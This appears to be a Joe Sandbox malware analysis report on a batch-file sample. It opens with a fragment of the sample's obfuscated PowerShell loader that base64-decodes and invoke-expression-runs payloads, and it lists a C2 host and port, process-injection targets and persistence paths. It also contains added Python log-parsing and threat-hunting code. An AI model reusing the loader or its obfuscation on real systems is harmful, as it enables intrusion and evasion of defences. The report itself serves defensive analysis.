($nqzfk in $blpnl) { if ($nqzfk.startswith('tdfvh')) { $zabdo=$nqzfk.substring(5); break; }}$ouiff=[string[]]$zabdo.split('\');invoke-expression '$pcr = mfhoz (aqluy ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($ouiff[0].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$azk = mfhoz (aqluy ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($ouiff[1].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$fem = mfhoz (aqluy ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($ouiff[2].replace("#", "/").replace("@", "a"))));'.replace('*', '');tnqry $pcr $null;tnqry $azk $null;tnqry $fem (,[string[]] (''));
Source: C:\Windows\System32\dllhost.exe Code function: 8_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 8_2_0000000140002300
Source: C:\Windows\System32\dllhost.exe Code function: 8_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 8_2_0000000140002300
Source: dwm.exe, 0000000E.00000002.2282495409.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000000E.00000000.2018886592.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: winlogon.exe, 00000009.00000000.1989333752.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000009.00000002.2326323721.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000E.00000000.2023779101.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000009.00000000.1989333752.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000009.00000002.2326323721.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000E.00000000.2023779101.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: winlogon.exe, 00000009.00000000.1989333752.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000009.00000002.2326323721.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000E.00000000.2023779101.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: winlogon.exe, 00000009.00000000.1989333752.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000009.00000002.2326323721.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000E.00000000.2023779101.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Source: C:\Windows\System32\winlogon.exe Code function: 9_3_00000225DC622AF0 cpuid 9_3_00000225DC622AF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\System32\Tasks\$nya-SgIauazY VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\System32\Tasks\$nya-SgIauazY VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\$nya-onimai2\IfMUlU.exeQueries volume information: C:\Windows\$nya-onimai2\IfMUlU.exe VolumeInformation
Source: C:\Windows\System32\dllhost.exeCode function: 8_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,8_2_0000000140002300
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC648090 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,9_2_00000225DC648090
Source: dllhost.exe, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.26.drBinary or memory string: MsMpEng.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
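To triage behaviour lines like the ones above at scale (this report carries thousands of them, most of them repeats), the following Python parser, added here and not part of the Joe Sandbox report, turns each flattened "Source: <process><action>: <target>" line into a record, counts identical events, and pulls out the discovery queries. The sample lines are copied from the report as extracted (including the "Jump to behavior" link residue); the list of discovery markers is my own choice and covers only the queries this report names.

```python
import re
from collections import Counter

# Shape of a Joe Sandbox behaviour line as it survives text extraction:
#   "Source: <image or dump><Action>: <target> <Category>Jump to behavior"
# The action keyword is glued to the source path and "Jump to behavior" is
# link residue, so the pattern handles both.
ACTIONS = ("Queries volume information", "WMI Queries", "Code function",
           "Binary or memory string")
LINE_RE = re.compile(
    r"^Source:\s*(?P<source>.+?)"
    r"(?P<action>" + "|".join(re.escape(a) for a in ACTIONS) + r"):\s*"
    r"(?P<target>.*?)(?:Jump to behavior)?\s*$")

# Discovery markers that appear in this report (AV enumeration via WMI,
# Win32_DiskDrive queries flagged as VM detection). Extend for your own use.
DISCOVERY_MARKERS = (r"root\SecurityCenter2", "AntiVirusProduct", "Win32_DiskDrive")


def parse_line(line: str):
    """Return {'source', 'image', 'action', 'target'} or None for non-matching lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    target = m["target"]
    if m["action"] == "Queries volume information":
        target = target.removesuffix(" VolumeInformation")  # trailing category tag
    source = m["source"]
    return {"source": source, "image": source.rsplit("\\", 1)[-1],
            "action": m["action"], "target": target}


def collapse(lines):
    """Parse lines and count identical (image, action, target) events."""
    counts = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec:
            counts[(rec["image"], rec["action"], rec["target"])] += 1
    return counts


def discovery_events(lines):
    """Distinct (image, target) pairs whose target carries a discovery marker."""
    return [(image, target) for (image, action, target) in collapse(lines)
            if any(marker.lower() in target.lower() for marker in DISCOVERY_MARKERS)]


# Sample input copied from the report lines above.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CATROOT = (r"C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}"
           r"\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat")
TASK = r"C:\Windows\System32\Tasks\$nya-SgIauazY"
DROPPED = r"C:\Windows\$nya-onimai2\IfMUlU.exe"
WMI_QUERY = r"IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct"

REPORT_LINES = (
    ["Source: " + PS + "Queries volume information: " + CATROOT + " VolumeInformationJump to behavior"] * 3
    + ["Source: " + PS + r"Queries volume information: C:\Program Files\WindowsPowerShell\Modules"
       r"\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior"]
    + [r"Source: C:\Windows\System32\svchost.exeQueries volume information: " + TASK
       + " VolumeInformationJump to behavior"] * 2
    + ["Source: " + DROPPED + "Queries volume information: " + DROPPED + " VolumeInformation"]
    + [r"Source: C:\Windows\System32\dllhost.exeCode function: 8_2_0000000140002300 "
       "AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,"
       "SetSecurityDescriptorDacl,CreateNamedPipeW,8_2_0000000140002300"]
    + ["Source: " + PS + "WMI Queries: " + WMI_QUERY] * 2
)

if __name__ == "__main__":
    for (image, action, target), n in collapse(REPORT_LINES).most_common():
        print(f"{n:3d}x {image:16s} {action}: {target}")
    print("discovery:", discovery_events(REPORT_LINES))
```

Running the block prints one line per distinct event with its repeat count, so the ten report lines collapse to six, and lists the AV-enumeration query as the only discovery event in the sample.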
ATT&CK matrix, flattened from the report's 14-column grid. Each tactic lists its cells in the order they appear on the page; a number in brackets is the count badge the matrix shows on that cell, and cells without one are unmatched template entries.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information; Determine Physical Locations
Resource Development: [1] Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server; Virtual Private Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain; Compromise Hardware Supply Chain
Execution: [11] Windows Management Instrumentation; [12] Native API; [12] Command and Scripting Interpreter; [11] Scheduled Task/Job; [2] PowerShell; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell; Unix Shell
Persistence: [1] Scripting; [1] DLL Side-Loading; [11] Scheduled Task/Job; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
Privilege Escalation: [1] DLL Side-Loading; [1] Access Token Manipulation; [713] Process Injection; [11] Scheduled Task/Job; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
Defense Evasion: [1] Disable or Modify Tools; [1] Obfuscated Files or Information; [1] Install Root Certificate; [1] Timestomp; [1] DLL Side-Loading; [11] File Deletion; [4] Rootkit; [121] Masquerading; [1] Modify Registry; [131] Virtualization/Sandbox Evasion; [1] Access Token Manipulation; [713] Process Injection; [2] Hidden Files and Directories
Credential Access: [1] Credential API Hooking; [11] Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging; GUI Input Capture
Discovery: [1] System Time Discovery; [2] File and Directory Discovery; [122] System Information Discovery; [241] Security Software Discovery; [2] Process Discovery; [131] Virtualization/Sandbox Evasion; [1] Application Window Discovery; System Owner/User Discovery; Network Sniffing; Network Service Discovery; System Network Connections Discovery; Process Discovery; Permission Groups Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media
Collection: [1] Archive Collected Data; [1] Credential API Hooking; [11] Input Capture; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture; Email Collection
Command and Control: [1] Encrypted Channel; [1] Non-Standard Port; [1] Non-Application Layer Protocol; [1] Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS; Proxy
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium; Exfiltration over USB
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking; Network Denial of Service

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph (ID 1574678, sample x.bat, start date 13/12/2024, architecture WINDOWS, score 100), rendered as a process tree. Node numbers are the graph's own; "graph badges" are the created-registry-values / created-files counts from the legend above; "injected" marks an existing process the parent wrote code into rather than one it started.

Sample-level signatures: Malicious sample detected (through community Yara rule); .NET source code references suspicious native API functions; Found large BAT file; 9 other signatures.

x.bat (2)
+-- cmd.exe (10, graph badge 1) [Suspicious powershell command line found; Suspicious command line found]
|   +-- powershell.exe (15, graph badges 3 30) [Uses schtasks.exe or at.exe to add and modify task schedules; Deletes itself after installation; Writes to foreign memory regions; 3 other signatures]
|   |   +-- dllhost.exe (24, graph badge 1) [Contains functionality to inject code into remote processes; Writes to foreign memory regions; Creates a thread in another existing process (thread injection); 2 other signatures]
|   |   |   +-- winlogon.exe (34, injected)
|   |   |   |   +-- dllhost.exe (55) [Protects its processes via BreakOnTermination flag; Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; 2 other signatures]
|   |   |   |       +-- svchost.exe (60, injected)
|   |   |   |       +-- spoolsv.exe (62, injected)
|   |   |   |       +-- svchost.exe (64, injected)
|   |   |   |       +-- svchost.exe (66, injected)
|   |   |   +-- lsass.exe (36, injected) [Installs new ROOT certificates]
|   |   |   +-- svchost.exe (39, injected) [System process connects to network (likely due to code injection or exploit)]
|   |   |   +-- 23 other processes (51, injected) -> iam.nigga.dad
|   |   +-- cmd.exe (27, graph badge 1) [Suspicious powershell command line found; Suspicious command line found]
|   |   |   +-- powershell.exe (41, graph badges 2 31) [Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); Hides that the sample has been downloaded from the Internet (zone.identifier); 2 other signatures]
|   |   |   |   network: iam.nigga.dad 103.230.121.81, remote port 4782, local port 49736 (VPSQUANUS, Hong Kong)
|   |   |   |   dropped: C:\Windows\$nya-onimai2\IfMUlU.exe (PE32+)
|   |   |   |   +-- schtasks.exe (58)
|   |   |   |       +-- conhost.exe (68)
|   |   |   +-- WMIC.exe (45, graph badge 1)
|   |   |   +-- conhost.exe (47)
|   |   |   +-- 2 other processes (53)
|   |   +-- cmd.exe (29, graph badge 2) dropped C:\Windows\$rbx-onimai2\$rbx-CO2.bat (DOS)
|   |   |   +-- conhost.exe (49)
|   |   +-- conhost.exe (32)
|   +-- WMIC.exe (18, graph badge 1) [Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)]
|   +-- conhost.exe (20)
|   +-- 2 other processes (22)
+-- IfMUlU.exe (13) [Machine Learning detection for dropped file]
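The chain in the graph (cmd.exe launching encoded PowerShell, PowerShell dropping into C:\Windows\$nya-onimai2 and registering a task, a C2 connection to iam.nigga.dad:4782, and dllhost.exe threading into winlogon.exe and lsass.exe) is what a responder would hunt for on other hosts. The Python below is an added example, not part of the Joe Sandbox report: it runs four rules over events in a Sysmon-like shape (EventID 1 process create, 3 network connect, 8 CreateRemoteThread, 11 file create). The field names, the constructed event list and the command lines are assumptions for illustration; only the host, IP, port, paths and process names come from the report.

```python
import re

# Indicators taken from the behaviour graph and file lists above.
C2_DOMAIN = "iam.nigga.dad"
C2_IP = "103.230.121.81"
C2_PORT = 4782  # remote port in the graph; 49736 is the local ephemeral port
DROP_PREFIXES = ("c:\\windows\\$nya-onimai2\\", "c:\\windows\\$rbx-onimai2\\",
                 "c:\\windows\\system32\\tasks\\$nya-")
# System processes the dllhost.exe instances wrote into, per the graph.
INJECTION_TARGETS = {"winlogon.exe", "lsass.exe", "svchost.exe", "spoolsv.exe", "explorer.exe"}
# -e / -ec / -enc / -encodedcommand switches, or an inline FromBase64String decode.
ENCODED_PS = re.compile(r"(?:\s-(?:e|ec|enc|encodedcommand)\s|frombase64string)", re.IGNORECASE)


def image_name(path: str) -> str:
    """Lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def hunt(events):
    """Return (rule, process, detail) tuples for every event that matches a rule."""
    alerts = []
    for ev in events:
        eid = ev["EventID"]
        if eid == 1:  # process creation
            img, parent = image_name(ev["Image"]), image_name(ev["ParentImage"])
            cmd = ev.get("CommandLine", "")
            if img == "powershell.exe" and parent == "cmd.exe" and ENCODED_PS.search(cmd):
                alerts.append(("encoded_powershell_from_cmd", img, cmd))
            elif img == "schtasks.exe" and parent == "powershell.exe":
                alerts.append(("schtasks_from_powershell", img, cmd))
        elif eid == 3:  # network connection
            if (ev.get("DestinationIp") == C2_IP or ev.get("DestinationPort") == C2_PORT
                    or ev.get("DestinationHostname", "").lower() == C2_DOMAIN):
                alerts.append(("c2_connection", image_name(ev["Image"]),
                               f'{ev.get("DestinationIp")}:{ev.get("DestinationPort")}'))
        elif eid == 8:  # CreateRemoteThread; add a source allowlist before deploying
            src, dst = image_name(ev["SourceImage"]), image_name(ev["TargetImage"])
            if dst in INJECTION_TARGETS and src != dst:
                alerts.append(("remote_thread_into_system_process", src, dst))
        elif eid == 11:  # file creation
            if ev["TargetFilename"].lower().startswith(DROP_PREFIXES):
                alerts.append(("drop_in_known_path", image_name(ev["Image"]), ev["TargetFilename"]))
    return alerts


PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed telemetry modelled on the graph; these records are not from the report.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'cmd.exe /c "C:\Users\user\Desktop\x.bat"'},
    {"EventID": 1, "Image": PS_EXE, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc QQBBAEEAQQA="},  # placeholder blob, not the sample's
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": PS_EXE,
     "CommandLine": r'schtasks.exe /create /tn "$nya-SgIauazY"'},  # arguments assumed; only the task name is in the report
    {"EventID": 3, "Image": PS_EXE, "DestinationHostname": "iam.nigga.dad",
     "DestinationIp": "103.230.121.81", "DestinationPort": 4782, "SourcePort": 49736},
    {"EventID": 3, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationHostname": "", "DestinationIp": "13.107.246.63", "DestinationPort": 443, "SourcePort": 49801},
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\dllhost.exe", "TargetImage": r"C:\Windows\System32\winlogon.exe"},
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\dllhost.exe", "TargetImage": r"C:\Windows\System32\lsass.exe"},
    {"EventID": 11, "Image": PS_EXE, "TargetFilename": r"C:\Windows\$nya-onimai2\IfMUlU.exe"},
    {"EventID": 11, "Image": r"C:\Windows\System32\cmd.exe", "TargetFilename": r"C:\Windows\$rbx-onimai2\$rbx-CO2.bat"},
    {"EventID": 11, "Image": PS_EXE,
     "TargetFilename": r"C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache"},
]

if __name__ == "__main__":
    for rule, proc, detail in hunt(SAMPLE_EVENTS):
        print(f"{rule:36s} {proc:16s} {detail}")
```

On the constructed events the browser connection and the PowerShell cache write stay quiet, and the seven alerts reproduce the graph: one encoded-PowerShell launch, one schtasks child, one C2 connection, two remote threads into system processes, two drops under the $nya-/$rbx- directories. The CreateRemoteThread rule is deliberately broad; on a real estate it needs an allowlist of legitimate sources.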

Screenshots: thumbnail images (not reproduced in this text extract).
Source | Detection | Scanner | Label
x.bat | 0% | ReversingLabs |
Source | Detection | Scanner | Label
C:\Windows\$nya-onimai2\IfMUlU.exe | 100% | Joe Sandbox ML |
C:\Windows\$nya-onimai2\IfMUlU.exe | 5% | ReversingLabs |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
https://word.office.comSRD1# | 0% | Avira URL Cloud | safe
https://powerpoint.office.comSRD13 | 0% | Avira URL Cloud | safe
https://powerpoint.office.com% | 0% | Avira URL Cloud | safe
https://outlook.comSRD1- | 0% | Avira URL Cloud | safe
https://excel.office.comSRD1% | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
iam.nigga.dad | 103.230.121.81 | true | true | | unknown
